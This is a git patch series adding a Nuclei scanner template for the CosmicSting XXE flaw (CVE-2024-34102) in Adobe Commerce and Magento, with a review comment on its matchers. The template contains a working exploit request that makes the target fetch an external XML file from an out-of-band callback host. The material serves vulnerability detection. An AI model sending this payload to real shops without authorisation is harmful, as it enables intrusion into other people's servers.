From 7d50cd4f0a40d883bc06a94f20d9b6d3dd930d1a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 25 Jun 2024 22:45:09 +0530
Subject: [PATCH 1/2] Create CVE-2024-34102.yaml (Adobe Commerce & Magento - CosmicSting)
---
 http/cves/2024/CVE-2024-34102.yaml | 41 ++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-34102.yaml
diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml
new file mode 100644
index 0000000000..42c338e4a0
--- /dev/null
+++ b/http/cves/2024/CVE-2024-34102.yaml
@@ -0,0 +1,41 @@
+id: CVE-2024-34102
+
+info:
+ name: Adobe Commerce & Magento - CosmicSting
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
+ reference:
+ - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
+ metadata:
+ fofa-query: app="Adobe-Magento"
+ verified: true
+ max-request: 1
+ tags: cve,cve2024,adobe,magento,xxe
+
+http:
+ - raw:
+ - |
+ POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: word
+ part: body
+ words:
+ - "message"
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
From 5a4588464fe924291e8053b5fc94a461ed0c2f7e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 26 Jun 2024 14:27:08 +0530
Subject: [PATCH 2/2] minor update
---
 http/cves/2024/CVE-2024-34102.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
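Review bot: The verdict in the `matchers` block rests on the `interactsh_protocol` word `dns` alone, because the `body` and `header` matchers would likely be satisfied by any JSON error response from this REST endpoint, whether the host is patched or not. A DNS lookup of the callback name can also come from an intermediary that resolves hostnames it sees in request bodies, so a DNS-only hit is weak evidence that the application itself fetched the URL. Since the request sets `dataIsURL` to true with an `http://` URL, consider requiring the HTTP interaction (`- "http"` under `part: interactsh_protocol`), or at least extend the inline comment to say that a DNS-only hit needs manual confirmation. The hunk in the second patch only tightens the body word and leaves this unchanged. The `info` block also has no `classification` entry (`cve-id: CVE-2024-34102`, `cwe-id: CWE-611`) and no `remediation` field, and it cites only a third-party write-up, so whoever triages a finding has no pointer to the vendor fix.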
diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml
index 42c338e4a0..debe60ad35 100644
--- a/http/cves/2024/CVE-2024-34102.yaml
+++ b/http/cves/2024/CVE-2024-34102.yaml
@@ -28,12 +28,12 @@ http:
 - type: word
 part: interactsh_protocol # Confirms the DNS Interaction
 words:
- - "dns"
+ - 'dns'
 - type: word
 part: body
 words:
- - "message"
+ - '"message":'
 - type: word
 part: header